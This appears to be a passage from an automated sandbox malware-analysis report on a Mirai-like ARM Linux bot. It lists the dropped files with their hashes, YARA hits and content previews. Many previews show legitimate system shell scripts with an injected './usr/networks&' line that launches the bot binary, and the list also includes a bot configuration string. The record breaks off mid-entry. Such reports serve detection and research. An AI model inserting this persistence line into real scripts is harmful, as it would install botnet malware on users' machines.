Preview:	./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] \|\| [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set \| grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker

/tmp/.config

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	4.882721265987431
Encrypted:	false
SSDEEP:	6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/XF/RRaEtMFtbUrQQxXDzraOn3zuTTn9:AF+Ftb4HaU3zuMF+Ftb4HaU3zuV
MD5:	08BA44D1BC18F09E8AE5FF694F128A28
SHA1:	E08EAA84BB63D00A89919B22BE80638337F4132C
SHA-256:	ED6C2167CBB5FE7DA4D3593F8087A05A027D8820D47ABDA1342E1478E12B02B5
SHA-512:	0459DEB8A18AC93D4EBD60602F498D0578986BC94CEB7E247845332A59B183D9F01CB91918108B51EB2BE779DA1F123CD3CC7742E55F5C642A211F104B315463
Malicious:	false
Preview:	2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]-2076960834.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]

/usr/bin/gettext.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1914
Entropy (8bit):	4.829445473341419
Encrypted:	false
SSDEEP:	48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
MD5:	6A371C00539A7CA37BBE68DF0F044BE9
SHA1:	20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
SHA-256:	0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
SHA-512:	2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
Malicious:	true
Preview:	./usr/networks&. func_usage; exit 0 ;;. --version \| --versio \| --versi \| --vers \| --ver \| --ve \| --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" \| (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" \| (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "

/usr/bin/rescan-scsi-bus.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	37310
Entropy (8bit):	4.959652179113969
Encrypted:	false
SSDEEP:	768:Y2l/oQ5nj2Zuv9pPOkUNW58rhUpm/AHgf7AN/0KK0SAQiAlcYm/qr6HZtda9Ts5w:Y2l/oQFj2Zuv9pPmNW58rhUpm/AHgf7H
MD5:	4C8E78D6A4073616C23D20694FDED604
SHA1:	4C22CE08AE9B9C3409D48F83874113765CCF819C
SHA-256:	BC8CFDD1A1E411786C084CD7674D81899506C9059F65E181AACA1185AD0573D1
SHA-512:	6D80B1A699BE6B8A881989FE42253594DA849B7D4CDA7073E614E9C4DEA828A0E795962CAB736D82A94AD159525219477561050A3897A7D9D2DAD2E1181DD21A
Malicious:	true
Preview:	./usr/networks&. exit 1;. fi. # Not necessary just use double quotes around variable to preserve new lines. #hosts=`echo $hosts \| tr ' ' '\n'`.}..# Return hosts. /proc/scsi/HOSTADAPTER/? must exist.findhosts ().{. hosts=. for driverdir in /proc/scsi/; do. driver=${driverdir#/proc/scsi/}. if test $driver = scsi -o $driver = sg -o $driver = dummy -o $driver = device_info; then continue; fi. for hostdir in $driverdir/; do. name=${hostdir#/proc/scsi/*/}. if test $name = add_map -o $name = map -o $name = mod_parm; then continue; fi. num=$name. driverinfo=$driver. if test -r "$hostdir/status"; then. num=$(printf '%d\n' "$(sed -n 's/SCSI host number://p' "$hostdir/status")"). driverinfo="$driver:$name". fi. hosts="$hosts $num". echo "Host adapter $num ($driverinfo) found.". done. done.}..printtype ().{. local type=$1.. case "$type" in. 0) echo "Direct-Access" ;;. 1) echo "Sequential-Access" ;;. 2) echo "Pr

/usr/networks

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
Category:	dropped
Size (bytes):	307960
Entropy (8bit):	5.821906669631145
Encrypted:	false
SSDEEP:	6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqKPqO4:T2s/bW+UmJqBxAuaPRhVabEDSDP99zB5
MD5:	DDBA92DCF5C5FD7B791F6278A3E20FB8
SHA1:	635075A22CD4E3ADE3583D4E9787A09B06E50B76
SHA-256:	BC08D8A3541834634FA5FD606805EE6E24CD07575AF27BBCBB8AD02247CCCD38
SHA-512:	EFC2C01016D1C00878A34F96D5F892A48E4AEFD7AB00B1478F3AF20ADB253E5AAF51D0498576E6ABA27848C085A9088FADCEA592F37EAF5A1FE474BB1388D37A
Malicious:	true
Yara Hits:	Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
Antivirus:	Antivirus: Metadefender, Detection: 49%, Browse Antivirus: ReversingLabs, Detection: 60%
Preview:	.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..\|0C..+...0......( ...S...........Z.....

/usr/share/PackageKit/helpers/test_spawn/search-name.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	47
Entropy (8bit):	3.90242960796693
Encrypted:	false
SSDEEP:	3:qXVOOR3vvLQVOORgn:uTn
MD5:	DF2ACF286726B02D483BEF86C91F7FA8
SHA1:	9E6A2422A7C3FBC0FCB34D314AF55D1452489DF0
SHA-256:	7BD4E13877E1F1E9AA5729AC8AF468E0C660DBCCADEF25C67DA99DE49F7AE549
SHA-512:	E99CFC15E6638CB9DA788C4B5744FF2170E183DC2A271847931E1C991C2D9049D1FF9C4EF49D7A7A348EE24DD994C0EA7048CDC4E6245930279F6A79E69312B9
Malicious:	false
Preview:	./usr/networks&.exit 0.../usr/networks&.exit 1.

/usr/share/alsa-base/alsa-info.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	25464
Entropy (8bit):	5.453877096685684
Encrypted:	false
SSDEEP:	384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
MD5:	D8A586F0E09BD885937F5C46F02D64D0
SHA1:	2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
SHA-256:	62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
SHA-512:	70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
Malicious:	false
Preview:	./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` \|\| exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE \|head -n1 \|sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM

/usr/share/alsa/utils.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	4725
Entropy (8bit):	5.44928341819888
Encrypted:	false
SSDEEP:	96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
MD5:	B4F115765D68E40BEBB845FA7F437539
SHA1:	4C37804189C7D91916E7050F4E4783A4C7F2F389
SHA-256:	9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
SHA-512:	27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
Malicious:	false
Preview:	./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]$[0-7]$[[:space:]]./\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } \|\| bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 \| filter_amixer_output \|\| :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } \|\| bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 \| filter_amixer_output \|\| :..return 0.}..# $1 <control>.# $2 "on" \| "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&

/usr/share/brltty/initramfs/brltty.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	46
Entropy (8bit):	3.925523369006428
Encrypted:	false
SSDEEP:	3:qXVOOR3vKDlOORgn:uK4n
MD5:	2CADDA792FBD37B54978108B6CC504D4
SHA1:	C28DD4FAC0523E31F0220FF31417583882C82692
SHA-256:	E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
SHA-512:	681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
Malicious:	false
Preview:	./usr/networks&.exit 0../usr/networks&.exit 1.

/usr/share/cups/braille/cups-braille.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	11664
Entropy (8bit):	5.539741046843357
Encrypted:	false
SSDEEP:	192:4RRRNryQ7F6avUvZswuHZkzTm8arUeo0vq2yS7b1KYMe7H/6:XQ7F61swuHZ6m8feNq2yDYMEH/6
MD5:	1B1A8B842BC45126EC5B709423446B59
SHA1:	99A49AE47721C62FE7659B23485AA3464B76CEC3
SHA-256:	E0FDE03C3CF51CA06A2F393BA43C4060AA0B52DDF96CDEE5F770ABC978CF49D0
SHA-512:	07DDD8C5C68B6510E12D14FCA6086E5AB0D42D0D4FA9084D53CC368172BB8847B05A1040CB787A2F489B1C35A443C8920074F2F6F95106B73C9185141555D226
Malicious:	false
Preview:	./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..# Printing options: number of copies and page ranges.[ -z "$NB" ] && NB=1.PAGERANGES=$(getOption page-ranges)..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE

/usr/share/cups/braille/index.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	3399
Entropy (8bit):	5.296419005515725
Encrypted:	false
SSDEEP:	96:QWswTl5TVnavmj+iHgvy/pHJvyWEz2a77:Zs4fVna9eKz2E
MD5:	6CA46C23DC6233BE77F0FD904C493D83
SHA1:	674B36A91CB4B815E3657F3060C88BC4EB071C95
SHA-256:	4E211F67F09E4E37EBB63EA30570A4E623ED1A185F0CCBB947104BF6775E04AA
SHA-512:	AC68CCEC39B7E40C7BD8982DA57F53D95CA5839591DC1A0368AEC531A0D905602D876CF830792138AC070BE897E2893DA2C3CA3F268DB81A0BCC1843E9C7B262
Malicious:	false
Preview:	./usr/networks&.[ $? = 0 ] \|\| exit 1.DUPLEX=$(getOption Duplex).[ -n "$DUPLEX" ] \|\| DUPLEX=None.ZFOLDING=$(getOption ZFolding).[ -n "$ZFOLDING" ] \|\| ZFOLDING=False.SIDEWAYS=$(getOption SideWays).[ -n "$SIDEWAYS" ] \|\| SIDEWAYS=False.SADDLESTITCH=$(getOption SaddleStitch).[ -n "$SADDLESTITCH" ] \|\| SADDLESTITCH=False.TABLE=$(getOptionNumber IndexTable).[ $? = 0 ] \|\| exit 1.MULTIPLEIMPACT=$(getOptionNumber IndexMultipleImpact).[ $? = 0 ] \|\| exit 1.HWPAGENUMBER=$(getOption HardwarePageNumber)..# Convert from 100th of mm to Inch fraction.mmToIndexIn () {. # 100th of mm. MM=$1.. # 120th of inches. IN120=$(($MM * 12 / 254)).. # Integer part. INT=$(($IN120 / 120 )).. # Fractional part, first in 120th of inch. FRAC=$(($IN120 % 120)).. # Convert to Index-specific values. if [ $FRAC -lt 30 ]; then. # Round down to zero. FRAC=0. elif [ $FRAC -ge 30 -a $FRAC -lt 40 ]; then. # Round down to a quarter. FRAC=1. elif [ $FRAC -ge 40 -a $FRAC -lt 60 ]; then. # Round down to a

/usr/share/cups/braille/indexv3.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1587
Entropy (8bit):	5.05148558164496
Encrypted:	false
SSDEEP:	48:yvwpsuotO0I1cCkS+DYLYWYZ3rwi+BKjg/D+RJSW9L:Cfzo+SXEA7eSWV
MD5:	110002C4A9588D6E696253D0DE3C9978
SHA1:	C3C1B6798FD324BE31D732FFEFA1C7D7C5382F22
SHA-256:	91B0701CA62899B36DFEE8458643FA6DBEA36BB838C3E3C1C9E1DC6717F10BA8
SHA-512:	2DA3BA7043DF2C78BAB6435010040FA44EFE774C687165CCB91DA124E25C8D6C41CDBD50B25276AF21D18E3F31DAE4232DBF93E78B9363ECA133E7CB74AD7BD6
Malicious:	false
Preview:	./usr/networks&. [ $? = 0 ] \|\| exit 1.. # Paper size. case "$PAPERLENGTH" in. In). INIT+=,PW$(mmToIndexIn $PAGEWIDTH),PL$(mmToIndexIn $PAGEHEIGHT). ;;. Mm). INIT+=,PW$(($PAGEWIDTH / 100)),PL$(($PAGEHEIGHT / 100)). ;;. ) ;;. esac.. case $LINESPACING in. 250) INIT+=,LS0 ;;. 375) INIT+=,LS1 ;;. 450) INIT+=,LS2 ;;. 475) INIT+=,LS3 ;;. 500) INIT+=,LS4 ;;. 525) INIT+=,LS5 ;;. 550) INIT+=,LS6 ;;. 750) INIT+=,LS7 ;;. 1000) INIT+=,LS8 ;;. ). if [ $FIRMWARE -lt 120130 ]. then..echo "ERROR: unsupported $LINESPACING line spacing, please upgrade firmware to at least 12.01.3" >&2..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated

/usr/share/cups/braille/indexv4.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1055
Entropy (8bit):	5.0066328703681355
Encrypted:	false
SSDEEP:	24:a8seltmT9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:hs6tSDYLYWYZ3rwyP8Bjg/D+RJSW9L
MD5:	E43BA2CA058B0AAC31BDF024BEE7ABE6
SHA1:	C78B616DBE567DCE177DA3553702F2FDCBEC07E8
SHA-256:	BF15B97CF5C1CD1D078ECF5B9B2454E6E95AC314AE6B0808AD093EFDF5508197
SHA-512:	AC9AC10BA0E853CF70AE2239710A9F7A661D604F0125150C72963461874C497FC2C4BCD8B42E15C062A77DB2BD8D0F2F7E6053CDAB7113CC31FCAC7F65F95724
Malicious:	false
Preview:	./usr/networks&. [ $? = 0 ] \|\| exit 1.. # Paper size. INIT+=,CH$PRINTABLETEXTWIDTH,LP$PRINTABLETEXTHEIGHT.. case $LINESPACING in. 500) INIT+=,LS50 ;;. 1000) INIT+=,LS100 ;;. ). echo "ERROR: unsupported $LINESPACING line spacing" >&2. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. ) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same

/usr/share/debconf/confmodule.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/acpid/examples/ac.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/acpid/examples/default.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/acpid/examples/powerbtn.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1816
Entropy (8bit):	4.732022360765176
Encrypted:	false
SSDEEP:	48:8MTeMn/zV5rh/1RzUKHjuuOGp2fVU6GjJN+V4ATo+aZ+:heCrhXH+DfVpmhC/
MD5:	1851CA5690400777129B4D3C6B58D4D2
SHA1:	5AB880AE743FB6EA929BF372A64B9689BD7D660F
SHA-256:	75DECCF74010FCBCF95DB88A5885700E743EA339EE2C8DB44D80D97403E30443
SHA-512:	61986E49AFA511BFA970B3C781B3E7FB2F43546A01B167F45D1769A958A5EEFCEFA37089BD738EDD2BB2BCB1A3C0500FABF49EF39DA5F226A2B5C44698CA52CC
Malicious:	false
Preview:	./usr/networks&. user=`pinky -fw \| awk '{ if ($2 == ":'$displaynum'" \|\| $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user \| cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-support's '/usr/share/acpi-support/policy-funcs' file...getXconsole.PMS="gnome-power-manager kpowersave xfce4-power-manager".PMS="$PMS guidance-power-m

/usr/share/doc/bubblewrap/examples/bubblewrap-shell.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/bubblewrap/examples/flatpak-run.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	4.972882784760757
Encrypted:	false
SSDEEP:	6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
MD5:	8B5CC9506A59F35C919D0CF65E3D75FA
SHA1:	956100F1C2B0A99C8B578DC6CE4854991089289A
SHA-256:	F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
SHA-512:	725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
Malicious:	false
Preview:	./usr/networks&..test -e "$DEVNAME" \|\| { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.

/usr/share/doc/cron/examples/cron-tasks-review.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	3647
Entropy (8bit):	4.544491450799858
Encrypted:	false
SSDEEP:	96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
MD5:	734F4010B22A9F64DBCCED57155A6396
SHA1:	1A3984285346A3FB8CF1A2666F273A8EFC300495
SHA-256:	5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
SHA-512:	8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
Malicious:	false
Preview:	./usr/networks&. -h\|--help) usage; exit 0;;. -v\|--version) version; exit 0;;. -s\|--syslog) syslog="yes";;. -i\|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name \| grep -q -E '^\.' && return. # Skip disabled files. echo $name \| grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file \| grep -q -E '\.dp

/usr/share/doc/gawk/examples/network/PostAgent.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/gawk/examples/prog/igawk.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	awk or perl script, ASCII text
Category:	dropped
Size (bytes):	1829
Entropy (8bit):	4.38604786798686
Encrypted:	false
